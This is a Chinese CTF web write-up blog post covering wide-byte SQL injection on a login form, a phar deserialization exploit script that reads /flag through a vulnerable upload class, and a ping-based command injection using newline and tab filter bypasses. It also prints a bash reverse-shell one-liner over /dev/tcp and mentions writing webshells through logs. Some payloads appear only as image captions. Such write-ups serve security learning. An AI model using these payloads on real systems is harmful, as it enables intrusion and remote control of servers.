php宽字节注入,web部分wp+复盘总结

php 投稿 1800 0 评论

0x01:

题目是一个登录框,但是基本上是过滤掉了所有的常见注入的关键词。实在是没思路,后面看了大佬wp,才发现是宽字节注入,同时还要利用虚拟表,同时还有mysql的hex编码。
payload:

其中 0x6531306164633339343962613539616262653536653035376632306638383365 为 password=123456d的hex(md5(password))  利用双写+宽字节构造payload。
123456加密后的md5:e10adc3949ba59abbe56e057f20f883e
因为宽字节的问题所以利用mysql 的hex编码一下:
php宽字节注入,web部分wp+复盘总结

0x02:

www.zip 拿到源码进行简单的审计:
开始以为是文件上传,后面一看发现是构造phar直接读。
得到class.php

<?php
class upload{
    public $filename;
    public $ext;
    public $size;
    public $Valid_ext;

    public function __construct(){
        $this->filename = $_FILES["file"]["name"];
        $this->ext = end(explode(".", $_FILES["file"]["name"]));
        $this->size = $_FILES["file"]["size"] / 1024;
        $this->Valid_ext = array("gif", "jpeg", "jpg", "png");
    }

    public function start(){
        return $this->check();
    }

    private function check(){
        if(file_exists($this->filename)){
            return "Image already exsists";
        }elseif(!in_array($this->ext, $this->Valid_ext)){
            return "Only Image Can Be Uploaded";
        }else{
            return $this->move();
        }
    }

    private function move(){
        move_uploaded_file($_FILES["file"]["tmp_name"], "upload/".$this->filename);
        return "Upload succsess!";
    }

    public function __wakeup(){
        echo file_get_contents($this->filename);
    }
}


class check_img{
    public $img_name;
    public function __construct(){
        $this->img_name = $_GET['img_name'];
    }

    public function img_check(){
        if(file_exists($this->img_name)){
            return "Image exsists";
        }else{
            return "Image not exsists";
        }
    }
}

构造payload:

<?php
class upload{
    public $filename = "/flag";
}
#new Phar()这里定义了生成的phar文件的名字(这里定义的时候后缀是一定要.phar)
#实际上生成后后缀名也可以改(比如awsl.awsl也行),标志该文件是phar文件的是下面的__HALT那里
$phar =new Phar("awsl.phar"); 
$phar->startBuffering();
#这里XXX的内容随便写,注意后面的XXX如果不用;来和__HALT分割记得留个空格隔开(个人觉得后面XXX还是写个PHP语句好,省点麻烦)
#__HXXXX(注释里直接用全称会被识别)这一节在这个setStub这里必须保证这个为结尾而且不可省,标志这个为phar文件
$phar->setStub("XXX<?php XXX __HALT_COMPILER(); ?>"); 
#把要序列化的变量申明好(这里只知道能放序列化的一个变量,不知道怎么放多个(或许单个文件只能放一个序列化的变量))
$a = new upload();
#将目标变量存入(这里自动把它序列化了)
$phar->setMetadata($a); 
#这里会按照文件名,文件内容的形式打包到phar文件中,当使用phar://awsl.phar://test.txt就会类似用include包含后面定义的代码(这里文件名不影响是否解析 
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();

?>

php.ini文件里面把

phar.readonly = off 这一行的注释给去掉,并且改成off
php宽字节注入,web部分wp+复盘总结
在本地运行php后,目录下会生成一个.phar的文件 因为phar是可以随便修改为jpg png gif的,所以这里直接随便改个后缀,然后上传 再读取的时候 get传参 phar://upload/文件名.jpg 即可得到flag

0x03:

RCE题
打开发现有个ping 操作。 结合经验猜测是rce
php宽字节注入,web部分wp+复盘总结
爆破一下账号密码,得到账号:admin 密码:admin123
php宽字节注入,web部分wp+复盘总结
登录后发现一样的,也是ban掉了很多关键词,利用字典fuzz这里看到 %0a可以绕过。
php宽字节注入,web部分wp+复盘总结
这里利用tac%09index.php 查看源码
php宽字节注入,web部分wp+复盘总结
发现这里过滤了好多命令,看到可疑的目录kylin 但是他把kylin给ban了,构造通配符直接进行flag的读取。
payload:

成功得到flag:

总结:

sql注入我是现在还没看懂,所以就没总结了。收获蛮大的。扩展了不少的思路,get到了大佬平时的思路,rce的那题,读文件的时候,队里师傅写了个一句话木马上去,ban了那么多关键词,我是怎么也想不到怎么写上去的。按我平时的思路就是,利用常见的命令 例如echo命令写马,但ban掉了不少东西, 同时,/也被ban了,进目录是没法搞的。但是大佬的思路是啥,日志写马,日志写马倒也是想到过,可是我/给我ban掉了,当时就没想到怎么给进目录,那么自然也就没法写马了,完了请教大佬的时候,大佬给我的是这样的:
php宽字节注入,web部分wp+复盘总结
思路是这样的,但是这个绕过属实是骚操作了。
php宽字节注入,web部分wp+复盘总结
另外还get到一个思路,就是平常的rce 如果是没有过滤掉管道符这种,可以直接利用反弹shell,直接读flag
具体操作
php宽字节注入,web部分wp+复盘总结
这是linux的一些反弹shell的命令,windows的大家可以自行百度。
常用的比如:

bash -i >& /dev/tcp/127.0.0.1/8080 0>&1

等等,骚操作还有不少,还有一些空格的绕过之类的操作。可以百度一下,有不少文章可以借鉴参考。
思路真的很重要,有时候你只能卡在一个地方走不了, 而大佬可以各种骚操作绕过等。

编程学习分享 » php宽字节注入,web部分wp+复盘总结

赞 (0) or 分享 (0)
游客 发表我的评论   换个身份
取消评论

表情
(0)个小伙伴在吐槽

高效,专业,符合SEO

联系我们